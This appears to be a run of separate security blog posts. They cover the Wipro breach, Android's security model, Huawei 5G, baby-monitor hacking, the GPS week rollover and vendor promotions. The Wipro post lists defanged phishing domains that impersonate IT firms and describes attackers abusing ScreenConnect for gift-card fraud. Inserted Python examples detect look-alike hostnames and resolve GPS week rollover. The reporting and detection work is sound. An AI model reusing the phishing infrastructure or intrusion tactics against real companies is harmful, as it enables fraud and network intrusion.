On Monday, KrebsOnSecurity broke the news that multiple sources were reporting a cybersecurity breach at Wipro, a major trusted vendor of IT outsourcing for U.S. companies. The story cited reports from multiple anonymous sources who said Wipro’s trusted networks and systems were being used to launch cyberattacks against the company’s customers.

A screen shot of the Wipro phishing site securemail.wipro.com.internal-message[.]app. Image: urlscan.io

In a follow-up story Wednesday on the tone-deaf nature of Wipro’s public response to this incident, KrebsOnSecurity published a list of “indicators of compromise” or IOCs, telltale clues about tactics, tools and procedures used by the bad guys that might signify an attempted or successful intrusion.

If one examines the subdomains tied to just one of the malicious domains mentioned in the IoCs list (internal-message[.]app), one very interesting Internet address is connected to all of them — 185.159.83[.]24. This address is owned by King Servers, a well-known bulletproof hosting company based in Russia.

According to records maintained by Farsight Security, that address is home to a number of other likely phishing domains:

securemail.pcm.com.internal-message[.]app
secure.wipro.com.internal-message[.]app
securemail.wipro.com.internal-message[.]app
secure.elavon.com.internal-message[.]app
securemail.slalom.com.internal-message[.]app
securemail.avanade.com.internal-message[.]app
securemail.infosys.com.internal-message[.]app
securemail.searshc.com.internal-message[.]app
securemail.capgemini.com.internal-message[.]app
securemail.cognizant.com.internal-message[.]app
secure.rackspace.com.internal-message[.]app
securemail.virginpulse.com.internal-message[.]app
secure.expediagroup.com.internal-message[.]app
securemail.greendotcorp.com.internal-message[.]app
secure.bridge2solutions.com.internal-message[.]app
ns1.internal-message[.]app
ns2.internal-message[.]app
mail.internal-message[.]app
ns3.microsoftonline-secure-login[.]com
ns4.microsoftonline-secure-login[.]com
tashabsolutions[.]xyz
www.tashabsolutions[.]xyz

The subdomains listed above suggest the attackers may also have targeted American retailer Sears; Green Dot, the world’s largest prepaid card vendor; payment processing firm Elavon; hosting firm Rackspace; business consulting firm Avanade; IT provider PCM; and French consulting firm Capgemini, among others. KrebsOnSecurity has reached out to all of these companies for comment, and will update this story in the event any of them respond with relevant information.
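The subdomain pattern in that list (a victim's own domain embedded as labels under the attacker's registrable domain) can be checked mechanically. The Python below is an added example, not KrebsOnSecurity's or Farsight's tooling; the protected-brand list, keyword list and two-label suffix rule are assumptions, and the hostnames are the defanged ones from the list above.

```python
"""Spot hostnames that impersonate a brand by embedding its domain as
subdomain labels (securemail.wipro.com.internal-message.app) or by carrying a
brand keyword in the attacker's own registrable label.

Added example, not tooling from the article. Assumptions: PROTECTED_DOMAINS
and BRAND_KEYWORDS are a constructed watch list; KNOWN_TLDS stands in for the
Public Suffix List, which a real deployment should use instead.
"""
from typing import Dict, Iterable, List, Optional, Tuple

PROTECTED_DOMAINS = {
    "wipro.com", "infosys.com", "cognizant.com", "capgemini.com",
    "avanade.com", "slalom.com", "rackspace.com", "elavon.com",
    "pcm.com", "searshc.com", "greendotcorp.com", "expediagroup.com",
    "virginpulse.com", "bridge2solutions.com",
}
BRAND_KEYWORDS = {"microsoft", "wipro", "cognizant"}
KNOWN_TLDS = {"com", "app", "xyz", "net", "org"}  # assumption: single-label suffixes


def refang(host: str) -> str:
    """Turn the article's defanged form (x[.]y) back into a parsable hostname."""
    return host.replace("[.]", ".").lower().strip(".")


def registrable_domain(host: str) -> str:
    """Last two labels under the single-label-suffix assumption."""
    labels = refang(host).split(".")
    return ".".join(labels[-2:])


def embedded_domains(host: str) -> List[str]:
    """'label.tld' pairs that appear left of the host's own registrable domain."""
    labels = refang(host).split(".")
    sub = labels[:-2]
    return [
        f"{sub[i]}.{sub[i + 1]}"
        for i in range(len(sub) - 1)
        if sub[i + 1] in KNOWN_TLDS
    ]


def classify(host: str) -> Tuple[str, Optional[str]]:
    """Return (attacker registrable domain, reason); reason is None if benign."""
    reg = registrable_domain(host)
    for dom in embedded_domains(host):
        if dom in PROTECTED_DOMAINS:
            return reg, f"embeds {dom}"
    if reg not in PROTECTED_DOMAINS:
        sld = reg.split(".")[0]
        for kw in sorted(BRAND_KEYWORDS):
            if kw in sld:
                return reg, f"keyword {kw} in {reg}"
    return reg, None


def group_by_infrastructure(hosts: Iterable[str]) -> Dict[str, List[str]]:
    """Map each attacker registrable domain to the reasons its hosts were flagged,
    which is how one set of phishing infrastructure shows up as a cluster."""
    clusters: Dict[str, List[str]] = {}
    for host in hosts:
        reg, reason = classify(host)
        if reason:
            clusters.setdefault(reg, []).append(reason)
    return clusters


# Hostnames copied (defanged) from the Farsight list in the article.
SAMPLE_HOSTS = [
    "securemail.pcm.com.internal-message[.]app",
    "secure.wipro.com.internal-message[.]app",
    "securemail.cognizant.com.internal-message[.]app",
    "secure.rackspace.com.internal-message[.]app",
    "ns1.internal-message[.]app",
    "mail.internal-message[.]app",
    "ns3.microsoftonline-secure-login[.]com",
    "tashabsolutions[.]xyz",
]

if __name__ == "__main__":
    for attacker_domain, reasons in group_by_infrastructure(SAMPLE_HOSTS).items():
        print(attacker_domain, "->", ", ".join(reasons))
```

Note that a legitimate host such as securemail.wipro.com has no labels left of its registrable domain, so it is never flagged by the embedding rule.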

WHAT ARE THEY AFTER?

It appears the attackers in this case are targeting companies that either have access to a large number of third-party company resources, or can be abused to conduct gift card fraud, or both.

Wednesday’s follow-up on the Wipro breach quoted an anonymous source close to the investigation saying the criminals responsible for breaching Wipro appear to be after anything they can turn into cash fairly quickly. That source, who works for a large U.S. retailer, said the crooks who broke into Wipro used their access to perpetrate gift card fraud at the retailer’s stores.

Another source said the investigation into the Wipro breach by a third party company has determined so far the intruders compromised more than 100 Wipro systems and installed on each of them ScreenConnect, a legitimate remote access tool. Investigators believe the intruders were using the ScreenConnect software on the hacked Wipro systems to connect remotely to Wipro client systems, which were then used to leverage further access into Wipro customer networks.

This is remarkably similar to activity that was directed against a U.S. based company in 2016 and 2017. In May 2018, Maritz Holdings Inc., a Missouri-based firm that handles customer loyalty and gift card programs for third parties, sued Cognizant (PDF), saying a forensic investigation determined that hackers used Cognizant’s resources in an attack on Maritz’s loyalty program that netted the attackers more than $11 million in fraudulent eGift cards.

That investigation determined the attackers also used ScreenConnect to access computers belonging to Maritz employees. “This was the same tool that was used to effectuate the cyber-attack in Spring 2016. Intersec [the forensic investigator] also determined that the attackers had run searches on the Maritz system for certain words and phrases connected to the Spring 2016 attack.”

According to the lawsuit by Maritz Holdings, investigators also determined that the “attackers were accessing the Maritz system using accounts registered to Cognizant. For example, in April 2017, someone using a Cognizant account utilized the “fiddler” hacking program to circumvent cyber protections that Maritz had installed several weeks earlier.”

Maritz said its forensic investigator found the attackers had run searches on the Maritz system for certain words and phrases connected to the Spring 2016 eGift card cashout. Likewise, my retailer source in the Wipro attack told KrebsOnSecurity that the attackers who defrauded them also searched their systems for specific phrases related to gift cards, and for clues about security systems the retailer was using.

It’s unclear if the work of these criminal hackers is tied to a specific, known threat group. But it seems likely that the crooks who hit Wipro have been targeting similar companies for some time now, and with a fair degree of success in translating their access to cash given the statements by my sources in the Wipro breach and this lawsuit against Cognizant.

What’s remarkable is how many antivirus companies still aren’t flagging as malicious many of the Internet addresses and domains listed in the IoCs, as evidenced by a search at virustotal.com.

Update, April 19, 11:25 a.m. ET: I heard back from some of the other targets. Avanade shared the following statement:

“Avanade was a target of the multi-company security incident, involving 34 of our people in February. Through our cyber incident response efforts and technologies, we swiftly contained and remediated the situation. As a result, there was no impact to our client portfolio or sensitive company data. Our review has concluded this was an isolated incident. Our security defenses have continued to protect against any potential threat related to this matter. And, we continue to take our responsibility to safeguard our clients’ data with the utmost seriousness.”

Cognizant replied:

“We are aware of reports that our company was among many other service providers and businesses whose email systems were targeted in an apparent criminal hacking scheme related to gift card fraud. Since the criminal activity first surfaced earlier this week and following reports that another service provider’s email system was allegedly compromised, Cognizant’s security experts took immediate and appropriate actions including initiating a review.”

“While our review remains ongoing, we have seen no indication to date that any client data was compromised. It is not unusual for a large company like Cognizant to be the target of spear phishing attempts such as this. The integrity of our systems and our clients’ systems is of paramount importance to Cognizant. We continuously monitor, update and strengthen our systems against unauthorized access and have put additional protocols in place related to this specific industry-wide incident.”

Infosys said it has not observed any breach of its network based on its monitoring and threat intelligence. “This has been ascertained through a thorough analysis of the indicators of compromise that we received from our threat intelligence partners,” the company said in a statement.

Rackspace said it has no evidence to indicate that there has been impact to the Rackspace environment: “Rackspace Security Operations continuously monitors our environment for threats and takes appropriate action should an issue be identified.”

Capgemini said its internal Security Operation Center (SOC) detected and monitored suspicious activity that showed similar patterns to the attack faced by WIPRO. “This occurred between March 4 and March 19. The activity concentrated on a very limited number of laptops and servers. Immediate remedial action took place. There has been no impact on us, nor on our clients to date.”

Slalom, another company listed above, said it can “confirm that phishing attack activity was detected and prevented between March 4 and March 19, which correlates to the information that you have published on the Wipro event. A combination of 24×7 Security Operations Center advanced security monitoring, security awareness training and threat intelligence automation enabled us to detect, alert, and prevent an event, sourcing from the phishing attacks. We have verified this through internal forensics and with the support of our threat intelligence partners.”

The Android Platform Security Model

Each Android release comes with great new security and privacy features. When it comes to implementing these new features we always look at ways to measure the impact with data that demonstrates the effectiveness of these improvements. But how do these features map to an overall strategy?
Last week, we released a whitepaper describing The Android Platform Security Model. Specifically we discuss:
  • The security model which has implicitly informed the Android platform’s security design from the beginning, but has not been formally published or described outside of Google.
  • The context in which this security model must operate, including the scale of the Android ecosystem and its many form factors and use cases.
  • The complex threat model Android must address.
  • How Android’s reference implementation in the Android Open Source Project (AOSP) enacts the security model.
  • How Android’s security systems have evolved over time to address the threat model.
Android is fundamentally based on a multi-party consent[1] model: an action should only happen if the involved parties consent to it. Most importantly, apps are not considered to be fully authorized agents for the user. There are some intentional deviations from the security model and we discuss why these exist and the value that they provide to users. Finally, openness is a fundamental value in Android: from how we develop and publish in open source, to the open access users and developers have in finding or publishing apps, and the open communication mechanisms we provide for inter-app interactions which facilitate innovation within the app ecosystem.
We hope this paper provides useful information and background to all the academic and security researchers dedicated to further strengthening the security of the Android ecosystem. Happy reading!
Acknowledgements: This post leveraged contributions from René Mayrhofer, Chad Brubaker, and Nick Kralevich.

Notes

  1. The term ‘consent’ here and in the paper is used to refer to various technical methods of declaring or enforcing a party’s intent, rather than the legal requirement or standard found in many privacy legal regimes around the world. 

Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program

McAfee has a rich history in helping to shape the industry’s response to the ever-changing threat landscape. We started as a pioneer in cybersecurity over three decades ago. Today, we are the device to cloud cybersecurity market leader, supporting consumers to small and large enterprises to governments.

But we don’t do this on our own. And in order for us to be successful in our mission to make the digital world more secure, we need to have the right people in place.

One of the largest challenges facing the cybersecurity industry today is the lack of skilled personnel and the global talent shortage. Current research indicates that our industry will face more than 1.5 million unfilled cybersecurity positions by 2025.

This talent shortage, coupled with the increasing volume of threats and the changing cybercriminal landscape, presents a problem which is only getting worse. And not just for us, but the whole industry. Therefore, we must, as a group, collectively improve upon this talent shortage.

So how will we do this?

One step that McAfee is investing heavily in is education. We are already doing a lot of work to support students and inspire them to take on careers in cybersecurity, for example our work in the UK with high school programs run at the home of the World War II code breakers Bletchley Park.

Now we’re delighted to be expanding this work even further as a founding partner of the new Master of Cybersecurity and Threat Intelligence at the University of Guelph, which will launch in September this year. This graduate degree will train the next generation on how to stop cyberattacks before they happen, and give students expertise in threat intelligence, threat hunting, digital forensics, intrusion prevention, privacy, cryptanalysis and more.

During the course, students will work with state-of-the-art cybersecurity tools where they can run real-world attacks within an isolated lab, engaging directly with active adversaries and learning their tactics, techniques and procedures to build state-of-the-art cyber defense and detection systems. They will learn the intricacies of how attacks are conducted and methods for preventing further intrusions. McAfee has already been involved with the development of the lab, ensuring it replicates our real-world labs to give students the right experience from the very beginning.

But we’re not just supporting the lab. Alongside partners including Cisco and BlackBerry, we’re also going to be showing up throughout the course and inviting students to work closely with us inside McAfee to build the skills they need for a future career in cybersecurity.

As a Canadian, I am particularly proud that a Canadian institution is showing this level of innovation which will enhance not only our local talent pool but will also help solve the global talent shortage.

To learn more, and apply to be one of the founding class, visit the University of Guelph here.

The post Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program appeared first on McAfee Blogs.

Top Cybersecurity Concerns with Huawei 5G Dominance

The Internet of Things (IoT) is creating a need to advance cellular capabilities to support the 14 billion IoT devices currently connected globally, a figure growing to between 20 and 50 billion devices by 2020 (Gartner and Cisco). This includes current mobile devices, computers, smart speakers and televisions, and will include more items like digital locks, security cameras, vehicles, and household appliances. Currently, the IPv4 address space is scarce, and the Internet Engineering Task Force (IETF) ratified IPv6 as an Internet Standard in July 2017. The growth of connected devices requires a larger IP scheme and network infrastructure that supports the connectivity of billions of devices at high speeds.

The next iteration for robust infrastructure is 5G, providing bandwidth up to 20 gigabits per second. Rollout begins this year, but a complete transition will take many years, and Huawei, a Chinese corporation, currently leads the technology. Huawei is the second largest provider of cellular phones worldwide and the largest manufacturer of network equipment.

The U.S. Government has taken a decided stance to block the use of Huawei in the United States, filing a complaint that bans all government agencies from engaging in purchasing from Huawei and bars third parties who use the company’s equipment (BBC). Huawei is currently suing the United States because of the ban. The U.S. is not the only country taking a cautious stance with Huawei, however. They’re joined by Germany, Great Britain, Australia, Canada, and Japan, all of which are citing major security concerns with the company (MIT Technology Review).

Security Concerns with Huawei dominating the 5G space:

1.  Security Vulnerabilities in Reconfiguring Networks

The first concern is that newer 5G network equipment is almost entirely software and constantly reconfigures, challenging security agencies, who examine equipment and software for vulnerabilities and security flaws or backdoors (FreshAir). When an organization is unable to identify weaknesses in devices with constantly changing software, it becomes impossible to implement security controls to limit vulnerabilities to an acceptable level, making an organization’s or state’s data accessible.

2.  Espionage & Interference

The second concern is the possibility of China using Huawei to conduct espionage or disrupt communications. A seven-month investigation into China’s Intellectual Property (IP) theft, led by the United States Trade Representative, estimates Chinese theft of American IP has cost the U.S. between $225 billion and $600 billion annually (CNN).

China has also used the Internet to enable rampant government oppression within its borders and is now focusing on other countries and foreign businesses. China is blocking and changing data, both coming into the country and going out of the country, using what Weaver, a network security expert at the International Computer Science Institute, has dubbed the Great Cannon (MIT Technology Review).

It is also concerning that China will likely continue to use the Internet to control narratives, as they did when Marriott listed Tibet and Hong Kong as separate countries from China, forcing an apology from the hotel chain. Chinese officials are also going after other companies that “misidentify” Taiwan (MIT Technology Review).

3.  Foreign Nation-State Controlled Networks

The third concern, and biggest security concern for the United States, is the vastness of a network controlled by a foreign company and potentially adversarial government. As Sanger (2019) reports, “classified intelligence reports from the U.S. have warned that China would one day use Huawei to penetrate American networks for cyber-espionage or cyberattacks.” Chinese private industry and the State are tightly tied with companies being answerable to the government. Current Chinese laws state that any Chinese telecom companies would have to participate in Chinese intelligence operations (BBC).

If Huawei controls the 5G network infrastructure, the company and the Chinese government have a tremendous advantage to collect, disseminate, and control data and critical infrastructure. With IoT expanding the attack surface it is important for countries and companies to advance their security.

Because of the persistent threat environment, companies require an adaptive security program.  Hiring a Managed Security Service Provider (MSSP) to implement a security solution would help U.S. companies prepare for current and future threats by monitoring, analyzing, encrypting, and assisting in security strategies against adversarial entities.

The post Top Cybersecurity Concerns with Huawei 5G Dominance appeared first on GRA Quantum.

Managing Privacy Compliance in the Cloud

The number and complexity of regulations addressing data privacy continues to increase significantly. Companies offering cloud-based services must comply with these regulations or risk losing business due to customer trust issues and/or potential fines and other legal action. Compliance with regulations like the GDPR and CCPA requires companies to address a wide range of items, including privacy assessments, cookie consent, and data subject access requests. The digitization of data has inevitably led to a myriad of data privacy laws that span the globe. These regulations all need to be considered when doing business in the respective countries/regions to which the … Continue reading Managing Privacy Compliance in the Cloud

The post Managing Privacy Compliance in the Cloud appeared first on TrustArc Blog.

Employees Share Stories Working in Award–Winning Cork Office

“The culture at McAfee is easy going, fun, dynamic and everyone is friendly.”—Deirdre, Project Manager

The McAfee office in Cork was once again named among companies recognized in Ireland’s Great Place to Work awards. Our Cork location has much to offer—from a supportive working environment to career growth opportunities, the opportunities are abundant.

Hear from three McAfee employees, Deirdre, Ranjit and Oliver, as they share their personal stories of working in the Cork, Ireland office.

Want to join in on the fun? We’re hiring in Cork! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post Employees Share Stories Working in Award–Winning Cork Office appeared first on McAfee Blogs.

This Week in Security News: Medical Malware and Monitor Hacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how baby monitors may be susceptible to hacking. Also, learn about a medical flaw that enables hackers to hide malware.

Read on:

Is Your Baby Monitor Susceptible to Hacking?

In a number of high-profile cases, home surveillance cameras have been easily compromised and disturbing reports of hacked baby monitors are in the news. 


Global Governments Demonstrate Rising Commitment to Cybersecurity

According to the International Telecommunications Union’s (ITU) 2018 Global Cybersecurity Index, only half of countries around the globe had a government cybersecurity strategy in 2017, which rose to 58 percent in 2018.

What Did We Learn from the Global GPS Collapse?

The problem highlights the pervasive disconnect between the worlds of IT and OT.

Malware Creates Cryptominer Botnet Using EternalBlue and Mimikatz

A malware campaign is actively attacking Asian targets using the EternalBlue exploit and taking advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to drop Trojans and a Monero coinminer on compromised machines.

Medical Format Flaw Can Let Attackers Hide Malware in Medical Images

Research into DICOM has revealed that the medical file format in medical images has a flaw that can give threat actors a new way to spread malicious code through these images.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

A hacker or group of hackers broke into a customer support account for Microsoft, and then used that to gain access to information related to customers’ email accounts such as the subject lines of their emails and who they’ve communicated with.

New Business Email Compromise Scheme Reroutes Paycheck by Direct Deposit

A new business email compromise (BEC) scheme, where the attacker tricks the recipients into rerouting paychecks by direct deposit, has emerged.

Leadership Turnover at DHS and Secret Service Could Hurt US Cybersecurity Plans

Departures of top officials at the Secret Service and Department of Homeland Security (DHS) will add to an already difficult public-private disconnect on cybersecurity, especially since Kirstjen Nielsen has a rare set of cybersecurity skills that helped the DHS protect companies in critical industries.

Microsoft Disclosed Security Breach From Compromised Support Agent’s Credentials

Microsoft has notified affected Outlook users of a security breach that allowed hackers access to email accounts from January 1 to March 28, 2019.

Do you think the leadership turnover at DHS and the Secret Service will hurt US cybersecurity plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Medical Malware and Monitor Hacks appeared first on .

Why Seqrite mSuite is the perfect solution for the research industry

Estimated reading time: 2 minutes

While market research organizations may not always attract the headlines in a manner similar to financial services and educational organizations, it would not be a misnomer to state that they remain at high risk of cyber attacks. The rationale behind that is very simple – market research organizations deal with huge amounts of data every single day. In fact, their primary mode of operation is analyzing and parsing through vast amounts of data to find correlations, trends, and corollaries.

Such a huge treasure of data makes these organizations attractive targets for cybercriminals and hackers. There is also the compliance risk: governments are increasingly aware of the issue and are passing rules and regulations that control the amount of data organizations can store, and market research organizations are directly exposed to the risk of non-compliance. The consequences can be quite costly – in 2016, a New York-based medical research institute incurred a $3.9 million penalty due to a security breach involving an unencrypted laptop.

The need for mobile security

Hence, market research organizations must ensure that they deploy strong cybersecurity solutions, especially on the mobile front. The proliferation of mobile phones in today’s day and age is a reality that has to be addressed by organizations in every industry, and mobile devices offer a huge number of vectors to breach an enterprise’s defenses.

Keeping the above in mind, Seqrite’s mSuite solution offers an option research organizations can explore. It is a comprehensive and powerful tool to manage all mobile devices running on Android and iOS operating systems. The solution allows network managers to get total control over all applications installed on official devices, monitor internet usage patterns, track device location and apply company policies as per the location and time, and provide support through remote device control as well as file transfer. Organizations can remain in total control of what’s happening with their data even beyond their own network.

In terms of the specific requirements of research organizations, mSuite is well equipped with the following features:

Virtual Fencing – Enforce digital boundaries and apply restrictions on devices with Wi-Fi, Geo and Time Fence. Multiple fence groups can be created and policy restrictions can be applied.

Network Data Monitoring – Data usage can be monitored over mobile and Wi-Fi networks. Details of data consumed and of calls, SMS, and MMS sent and received can be easily accessed.

Device Security Policies – Enhanced security is offered with multiple default policies which can be customized for compliance. Policies are framed around password, app security, etc.

Customized Reporting – Standard and custom interactive reports are generated providing graphical summaries about infection status and application non-compliance.

Apart from these, research organizations can rest easy knowing their valuable data is secure thanks to a range of comprehensive mobile security and anti-theft features including:

Anti-malware – A best-in-class, built-in antivirus is provided to keep devices safe from viruses, Trojans, ransomware and cybercrime attacks.

Anti-theft – Devices can be remotely located and locked with data wiped on lost or stolen devices. On SIM change, the devices can be completely blocked or locked.

Scan Scheduler – Admins can remotely schedule a Quick Scan/Full Scan at any time and monitor the status of enrolled devices for security risks and infections.

Web Security – Seqrite’s powerful browsing, phishing and web protection is in-built within the solution with the ability to blacklist/whitelist URLs or use category/keyword-based blocking.

The above features make Seqrite mSuite a great solution for research organizations when it comes to securing the mobile front.

The post Why Seqrite mSuite is the perfect solution for the research industry appeared first on Seqrite Blog.

5 ways to instantly detect a phishing email and save yourself from phishing attack

Phishing is a fraudulent activity to trick you into revealing your personal and confidential information. This information usually includes bank account details, net banking details, credit/debit card numbers, login ID and passwords. Every day, countless people become unsuspecting victims of phishing attacks. With cyber criminals adopting sophisticated modes of phishing…

How do I stop old USB drives from infecting my new Windows PC?

Jason wants to protect his new high-end laptop from viruses but needs data on old SD cards

I’ve just bought a high-end Windows laptop for video editing while travelling around Europe. What steps can I take to prevent any possible infections from being passed on from previous machines on SD cards and external hard drives? Some of the external hard drives go back to machines from 2004 but I have never plugged any of them into any computers other than my own previous Macs and PCs. I work professionally with video, photography and coding, so all of this data is vital.

I have a five-machine Bitdefender licence but I’d be prepared to use another protection system, and I’ve looked at Sophos Intercept X. Jason

There are at least three things to think about. First, there’s the threat level: how at risk are you? Second, there’s provenance: how much do you know about your devices? Third, how can you mitigate any risks revealed by the answers to the first two questions?


What Did We Learn from the Global GPS Collapse?

On April 6, 2019, a ten-bit counter rolled over. The counter, a component of many older satellites, marks the weeks since Jan 1, 1980. It rolled over once before, in the fall of 1999. That event was inconsequential because few complex systems relied on GPS. Now, more systems rely on accurate time and position data: automated container loading and unloading systems at ports, for example. The issue was not with the satellites or with the cranes.

The problem highlights the pervasive disconnect between the worlds of IT and OT. Satellites are a form of industrial control system. Engineers follow the same set of principles designing satellites as they do designing any other complex programmable machine. Safety first, service availability next.

In the 1990s satellites suffered a series of failures, prompting the US General Accounting Office (GAO) to review satellite security. The report (at https://www.gao.gov/products/GAO-02-781) identifies two classes of problems that might befall satellites, shown in these two figures.

Figure 1: Unintentional Threats to Satellites

Figure 2: Intentional Threats to Satellites

This analysis is incomplete. It omits an entire class of problems: software design defects and code bugs. The decision to use a 10-bit counter to track the passing weeks is a design defect. The useful life of a satellite can be 40 years or more. A 10-bit counter runs from 0 to 1,023, then rolls over to zero. Since there are 52 weeks in a year, the counter does not quite make it to 20 years. This design specification was dramatically under-sized. More recent designs use a 13-bit counter, which will not roll over for almost 160 years. That provides an adequate margin.
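As an added example (not code from the original post), the arithmetic behind that paragraph in Python: the rollover period of an n-bit week counter, a design-margin check against a 40-year service life, and how a receiver can recover the full week number from the truncated one when it knows a date that the present cannot precede (for example its own firmware build date). It takes 6 January 1980 as the GPS epoch, the value in the GPS interface specification.

```python
from datetime import date, timedelta

# GPS week 0 began on 6 January 1980 (the epoch defined in the GPS interface
# specification). Each subsequent week increments the counter by one.
GPS_EPOCH = date(1980, 1, 6)
LEGACY_WEEK_BITS = 10   # the counter discussed in the post: wraps after 1024 weeks
MODERN_WEEK_BITS = 13   # the wider counter in newer designs: wraps after 8192 weeks


def rollover_period_weeks(bits: int) -> int:
    """Number of weeks an unsigned counter of `bits` bits counts before wrapping."""
    return 1 << bits


def rollover_period_years(bits: int) -> float:
    """Same period expressed in mean Gregorian years (365.25 days)."""
    return rollover_period_weeks(bits) * 7 / 365.25


def counter_is_adequate(bits: int, design_life_years: float) -> bool:
    """Design check: does the counter outlive the asset it is built into?"""
    return rollover_period_years(bits) >= design_life_years


def truncate_week(full_week: int, bits: int) -> int:
    """What a `bits`-bit counter actually transmits for a given full week number."""
    return full_week % rollover_period_weeks(bits)


def resolve_week(truncated_week: int, bits: int, not_before,
                 epoch: date = GPS_EPOCH) -> int:
    """Recover the full week number from a truncated one.

    The transmitted value repeats every `period` weeks, so on its own it is
    ambiguous. A receiver can disambiguate it if it knows a date the present
    cannot be earlier than (e.g. its firmware build date). Returns the smallest
    full week number >= that bound that is congruent to the transmitted value.
    `not_before` may be a date or an ISO-8601 string such as "2015-01-01".
    """
    period = rollover_period_weeks(bits)
    if not 0 <= truncated_week < period:
        raise ValueError("truncated week out of range for counter width")
    if isinstance(not_before, str):
        not_before = date.fromisoformat(not_before)
    min_week = (not_before - epoch).days // 7
    # Smallest k >= 0 such that truncated_week + k*period >= min_week
    # (-(-x // p) is integer ceiling division).
    k = max(0, -(-(min_week - truncated_week) // period))
    return truncated_week + k * period


def week_start(full_week: int, epoch: date = GPS_EPOCH) -> date:
    """Calendar date on which a full GPS week begins (leap seconds ignored)."""
    return epoch + timedelta(weeks=full_week)


if __name__ == "__main__":
    # Constructed scenario: the second rollover. Full week 2048 is transmitted
    # as 0 by a 10-bit counter. A receiver anchored on its 2015 firmware date
    # recovers week 2048; a naive one anchored on the epoch lands in 1980.
    sent = truncate_week(2048, LEGACY_WEEK_BITS)
    print("transmitted week field:", sent)
    print("anchored receiver     :", week_start(resolve_week(sent, LEGACY_WEEK_BITS, "2015-01-01")))
    print("naive receiver        :", week_start(resolve_week(sent, LEGACY_WEEK_BITS, GPS_EPOCH)))
    print("10-bit period (years) : %.1f" % rollover_period_years(LEGACY_WEEK_BITS))
    print("13-bit period (years) : %.1f" % rollover_period_years(MODERN_WEEK_BITS))
    print("10-bit OK for 40 years?", counter_is_adequate(LEGACY_WEEK_BITS, 40))
```

Because GPS time does not count leap seconds, the week-2048 boundary computed here (7 April 2019 in the GPS calendar) falls a few seconds before midnight UTC on 6 April 2019, the date the post gives.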

As for code bugs, satellites suffer them just like any other programmable system. The Socrates network tracks satellites to project potential collisions. In 2009, Socrates predicted that two satellites, a defunct Soviet-era communications satellite and the Iridium constellation satellite #33, were projected to pass 564 meters apart. In reality, they collided, creating over 2,000 pieces of debris larger than 1 cm in size. Whether the defect arose from buggy code or inadequate precision in observations, the satellites collided. Either way, there is a software defect here. The question is, is the software inaccurate, or is it creating precision that does not exist? If the instruments doing the measurement have a margin of error, the report should include that data. By stating that the satellites will pass 564 meters apart, the value implies a precision of ½ meter either way – between 563.5 meters and 564.5 meters. If the precision is within half a kilometer, the software should state that specifically – “Possible collision – distance between objects under 1 KM.” If the input data is precise, then the code is calculating the trajectories incorrectly. Either is a code bug.

These two types of defects are neither unintentional (code and designs do not degrade over time) nor intentional (no saboteur planted the defect). The third class of defect results from inconsistent design specifications (the satellite can live for 40 years but the counter rolls over in 20) or poor coding practices (creating a level of precision unsupported by the measurements, or calculating the trajectories incorrectly). These are software defects.

As we all know, there was no failure in the GPS system. I made a passing comment during a talk on satellite security at the RSA 2019 conference. A reporter from Tom’s Guide was there, and he wrote an excellent article on the problem: https://www.tomsguide.com/us/gps-mini-y2k-rsa2019,news-29583.html.

The failure is not including software issues among the risks to a programmable device.

What do you think? Let me know below or @WilliamMalikTM.

The post What Did We Learn from the Global GPS Collapse? appeared first on .

Is Your Baby Monitor Susceptible to Hacking?

There’s no doubt that digital technology, in many of its forms, brings everyday tasks much closer-to-hand. From discovering breaking news, to online shopping, to keeping tabs on your home via security cameras—everything is within the touch of a button. Even so, with the growing reach of the Internet of Things (IoT), new and unsuspected threats are just around the corner—or are already here. 

One of the most alarming threats to emerge is the breach of privacy. In a number of high-profile cases, home surveillance cameras have been easily compromised and disturbing reports of hacked baby monitors are in the news.

For example, in early January of this year, a Western Australian mother voiced her worries when she discovered that the baby monitor she recently purchased was compromised. The monitor allowed her to log in with a QR code and a generic password in order to watch her child through a camera. Though she followed the instructions for installation, upon opening the monitoring website she was greatly alarmed to see a vision of a stranger’s bedroom, rather than her child’s.

This type of case isn’t isolated, as another report surfaced last year when a stranger allegedly hacked a baby monitor camera to watch a mother breastfeed. In yet another case, a Texas couple, whose devices were hacked, said they heard a man’s voice coming from their baby monitor threatening to kidnap their child. It doesn’t get much scarier than that.

Though you might not have prepared for it, it’s increasingly clear you need to take steps to protect yourself, your children, your privacy, and your new smart devices from these kinds of emerging privacy threats, as well as others. As a first precaution, you should always remember to change the default passwords on all your networked devices, starting with your router, creating strong new ones and securing them safely whenever possible with a password manager. You should then pick the best endpoint and network security solutions you can find to protect all the networked devices in your home.

Trend Micro Password Manager provides a password manager that lets you generate and sync strong passwords across your PCs, Macs, Android, and iOS devices.

In addition, Trend Micro Security provides the best endpoint security for PCs, Macs, Android and iOS—a key part of any home security strategy. Trend Micro Maximum Security includes Trend Micro Mobile Security as part of its subscription, so you can protect up to 10 devices.

Finally, Trend Micro Home Network Security is specifically designed to protect all your new “smart” connected devices in the home. It filters incoming and outgoing traffic to provide an extra layer of protection against intrusions or hacking of the home network. It protects your router and a wide range of smart devices, including security cameras, child monitoring devices, smart TVs, refrigerators, smart speakers, and even smart doorbells and thermostats, from emerging IoT threats—and the list goes on.

With our endpoint and network security solutions, we’ve got you covered! Click the links above for more details on our solutions.

The post Is Your Baby Monitor Susceptible to Hacking? appeared first on .

We are hiring – Senior Cybersecurity Consultant

Due to the continued expansion of our DPO as a Service, and CSO as a Service offerings, BH Consulting is now seeking to recruit a Senior Cybersecurity Consultant to join its growing team.

BH Consulting is a dynamic and fast-paced cybersecurity and data protection consulting firm. We provide a market leading range of information security services focused on GDPR, cybersecurity, cyber risk, digital forensics, ISO 27001, and awareness training.

We have a vast range of clients from private and public sector organisations, to large global multinational organisations. We operate both domestically in Ireland and Internationally with our head office located in Dublin.

The trust relationship with our customers underpins the fibre of our organisation. We nurture this trust relationship by investing time and resources to understand our customers’ business needs, and we provide advice that aligns with those needs.

Our team is passionate about successfully addressing the cybersecurity and data protection issues our customers have. We continue our journey to grow and expand and have established a new senior role within our organisation to support this growth.

